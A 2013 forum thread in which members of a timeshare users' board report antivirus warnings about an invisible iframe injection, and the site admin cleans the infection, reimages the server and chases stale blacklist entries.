# TUG Blacklisted again?



## Blues (May 15, 2013)

My work computer has Symantec Endpoint Protection installed.  Today, it's again giving me popups when I browse to TUG BBS.  It's reporting SID 25616, described here:

http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=25616

Is this just a case of a cached blacklist getting re-published?  Or is there actually an infection in TUG BBS now?

-Bob


----------



## TUGBrian (May 15, 2013)

have had one other report of this today....are investigating it now.


----------



## SmithOp (May 15, 2013)

Shows up here.

http://www.mxtoolbox.com/SuperTool.aspx?action=mx:Tugbbs.com&run=toolpage#


----------



## TUGBrian (May 15, 2013)

yep, identified it...working to clean now.


----------



## TUGBrian (May 15, 2013)

annd now the scan shows its clean...this is ridiculous.


----------



## jeffwill (May 15, 2013)

I logged on 5 minutes ago and had my threat detector alarm sound off.  Is this related--- or some spasm in my computer ?


----------



## TUGBrian (May 15, 2013)

is it still doing it now?


----------



## TUGBrian (May 15, 2013)

even the site scanner i used a few minutes ago to confirm a javascript warning is now showing thats gone and the site is clean.

lkajsd;lkfjasdkf  not this again


----------



## TUGBrian (May 15, 2013)

guessing that noone that previously was getting an error, is currently getting one?


----------



## pedro47 (May 16, 2013)

jeffwill said:


> I logged on 5 minutes ago and had my threat detector alarm sound off.  Is this related--- or some spasm in my computer ?



I received this message this morning on my home computer.  I am not at work no problem.

Brian, what is going on ?


----------



## Arnie (May 16, 2013)

*None Here*

Just logged on from Edisto Beach ATT WiFi.
Nothing noted here. appears to be cleaned.


----------



## T_R_Oglodyte (May 16, 2013)

I got it when logging on just now.  Picked up my AVG antivirus.

reported as an invisible Iframe injection



> You searched for Invisible IFrame Injection (type 1707), which is detected by AVG and is part of the Invisible IFrame Injection family. The most popular variants of Invisible IFrame Injection are Invisible IFrame Injection (type 1707), Invisible IFrame Injection (type 1711)
> What is Invisible IFrame Injection?
> 
> An Invisible IFrame Injection happens when an unwanted and hidden third party page is inserted into a webpage by an attacker. To hide the injection, hackers make the style of the IFrames invisible. As most malware, an Invisible IFrame Injection exploits vulnerabilities in the system and browsers of the visitors of the website and force adware, phishing programs or any other type of fraudulent software to be installed on their device.


----------



## richardm (May 16, 2013)

I also received a malicious malware threat warning just now.


----------



## TUGBrian (May 16, 2013)

as many details as you can provide from your virus scanners would be helpful.


----------



## TUGBrian (May 16, 2013)

this is clearly another browser or os specific thing yet again...

for any of you who are indeed getting an av warning, visit this site right after the warning to see if you can get it to return a result

http://sitecheck.sucuri.net/scanner/


----------



## TUGBrian (May 16, 2013)

so this appears to be sneaky, and should only trigger once per IP address/operating system, and even browser type according to something i dug up in searches.

it does this to prevent detection and or reproduction from admins/etc trying to track down its source.

I found a large article on it (or what I believe to be it) that ive forwarded on to our hosting company in hopes they can wipe it out for good.  Sadly I am pretty sure I mentioned this when it happened 6 months ago and they told me "it wasnt possible"...at this point I cant see how its not the cause as it describes the issue perfectly.

that said, i would suggest using a current and updated (and active vs passive) antivirus software when browsing TUG for the time being just in case!


----------



## geekette (May 16, 2013)

Got it yesterday at work, I was prevented from accessing site due to some malicious hoo hah.  Didn't note message (sorry), just moved on.  did not attempt again yesterday.

Got right in today with no problems, messages, etc.

I was / am using Firefox.


----------



## easyrider (May 16, 2013)

Im using Microsoft Security Essentials and the free version of super anti spyware and haven't had any problem with tug.


----------



## TUGBrian (May 16, 2013)

yea, its definitely an annoying little bugger...and definitely only impacts a small % of visitors.

ive been holding off on the newsletter all day as I dont want to send links to the bbs to nearly 50,000 people with a chance of some of them getting infected.

*sigh


----------



## Chetan Savade (May 17, 2013)

@Blues 

Hi,

I am Chetan Savade from Symantec Technical Support team.

Do you still get this warning message?

If need any help from my end please let me know.

Regards,
Chetan Savade


----------



## TUGBrian (May 17, 2013)

i highly doubt this individual is from symantec FYI....since his email is a gmail one.


----------



## TUGBrian (May 17, 2013)

looks like our support team has finally identified something that "isnt supposed to be there"

sadly, its the same thing they said "wasnt possible" when this happened 6 months ago...so hopefully its caught it for good.

Ill send out the newsletter here shortly.


----------



## Jaybee (May 17, 2013)

I hope it's all gone now.  When I first tried to log in this morning, I got the same thing Steve got...the warning from AVG. I went in another way, and there was no problem...???? Onward...and Upward!  We shall overcome..(and all that jazz)


----------



## TUGBrian (May 17, 2013)

appears our host is suggesting we reimage the server yet again....while it was down for longer than expected last time, at least it was relatively painless.

so ill schedule this for sometime late at night this coming week.


----------



## geekette (May 17, 2013)

I just got the nastygram again, Firefox.

Blocked request:  file contains malicious code (specifically, tugbbs.com/forums)

Threat:  Troj/iframe-IP

This is Sophos web protection feedback

Just got right in on IE


----------



## TUGBrian (May 17, 2013)

ill try to schedule the reimage sooner rather than later.


----------



## Smokatoke (May 17, 2013)

just got a symantec warning when visiting....


----------



## TUGBrian (May 17, 2013)

this is being scheduled for 4am sunday morning (or late sat night depending on how you look at it)


----------



## caneil (May 17, 2013)

*Norton Sent a Red Flag*

Norton just notified me of a prevented attack.


----------



## TUGBrian (May 18, 2013)

quick tool to disable iframes in internet explorer!

    Open Internet Explorer, select Tools | Internet Options
    Click the Security tab
    Choose the desired zone (Internet, Local intranet, Trusted sites, or Restricted Sites) and click Custom Level
    Scroll down to Launching programs and files in an IFRAME
    Select Disable to prevent iframes altogether or Prompt if you wish to decide on a site-by-site basis.
    Click OK
    Repeat for each of the desired security zones.
    Click OK to exit the Internet Options menu.


----------



## TUGBrian (May 18, 2013)

this should disable iframes in opera

Opera
    Ctrl+F12 -> Advanced -> Content -> Style Options -> uncheck Enable inline frames


----------



## TUGBrian (May 18, 2013)

also note the server hosting TUG2.NET and these forums will be taken offline tonight at approx 3am and will be down for a few hours while they are reimaged to fix this problem yet again.

you can still access TUG member only features via http://tug2.com


----------



## TUGBrian (May 18, 2013)

this starts in about 4 hours, please note again the servers will be offline for an undetermined amount of time (although i fully expect it to be done before noon etc).


----------



## Makai Guy (May 19, 2013)

Seems to have gone without a hitch.  

I have my fingers crossed that this eliminates the exploit (yet again ...)


----------



## TUGBrian (May 19, 2013)

yep, all looks done...other than a minor issue on tug2.net....all appears well with the reimage!


----------



## siesta (May 19, 2013)

Good thing I only visit tug from my ipad.


----------



## linsj (May 22, 2013)

I'm on a public network with Hotspot Shield protection right now. It's telling me this site has a malware infection and is blocking it.


----------



## TUGBrian (May 22, 2013)

thats likely one of the "blacklist pages" that hasnt updated yet...vs a local antivirus software.

We ran into that last time...once a site gets reported it takes ages for it to come off the blacklist part.

can you give me more details on the error just to be sure?


----------



## linsj (May 22, 2013)

TUGBrian said:


> thats likely one of the "blacklist pages" that hasnt updated yet...vs a local antivirus software.
> 
> We ran into that last time...once a site gets reported it takes ages for it to come off the blacklist part.
> 
> can you give me more details on the error just to be sure?



I can't remember exactly, but it was something about a reported malicious malware. So your assumption is correct.


----------



## TUGBrian (May 22, 2013)

I certainly still want to be sure!  (although noone else has reported an issue since the reimage...so the odds are low)

let me know if you go back to that place please!


----------



## linsj (May 23, 2013)

Here's the exact message:
Warning: This is a reported infected by malware page, blocked by Hotspot Shield.


----------



## TUGBrian (May 23, 2013)

yea...thats just on a blacklist somewhere that hasnt been updated....ill see if I can find a way to petition whatever list they are using.


----------



## Blues (May 23, 2013)

Sorry I dropped this on everyone and then went away.  I almost forgot I had reported it, because after the first day, I never saw it again.  So, all appears in order from here, the OP.

-Bob


----------



## czar (May 29, 2013)

May well be user error on my end, but Monday night and all day yesterday, TUG did not work on my home network on any of my devices (iPad, iPhone, or macbook).  It was fine loading via thethering to my phone, and it was fine on my work network.  I did clear my cache and settings, history, etc., but still no go.  I'll try again tonight but thought that it was weird that it was blocked when every other website I tried worked.


----------



## timeos2 (May 29, 2013)

czar said:


> May well be user error on my end, but Monday night and all day yesterday, TUG did not work on my home network on any of my devices (iPad, iPhone, or macbook).  It was fine loading via thethering to my phone, and it was fine on my work network.  I did clear my cache and settings, history, etc., but still no go.  I'll try again tonight but thought that it was weird that it was blocked when every other website I tried worked.



I have noted an issue similar to yours. Some specific routers will not let you get to TUG - most will. I'm guessing that whatever it is that is triggering some to block it will get worse over time and eventually steps will have to be taken to figure out what/where is causing the issue.  Although it is very limited I have seen it on multiple machines & different smartphones. It can be caused or undone by simply changing what source router the device(s) are currently using. It is clearly some type of security block as the error starts out as a rights issue then blocks the sites (all of them not just the BBS).  If I simply change what router that device is connecting to the problem disappears. Changing back immediately puts the block back on.  I've never seen anything quite like it before. It will be interesting to find out (eventually) what is happening.


----------



## TUGBrian (May 29, 2013)

if you are unable to access TUG like this, it could certainly be a security rule being tripped (we disabled one last night that kept some folks from posting).

Should this happen to you, email me the date/time it happened...and your IP address.

you can get your ip address easily from http://whatismyip.liquidweb.com

should easily be able to track down the issue with that info from you.


----------



## linsj (Jun 13, 2013)

Still getting the same message with Hotspot Shield that I reported in #41.


----------



## TUGBrian (Jun 13, 2013)

ive had no luck in getting any sort of communication with them to even inquire about their "list"...im sorry.


----------



## linsj (Jun 14, 2013)

TUGBrian said:


> ive had no luck in getting any sort of communication with them to even inquire about their "list"...im sorry.



Thanks for trying. At least I know the site is safe and can still get to it.


----------

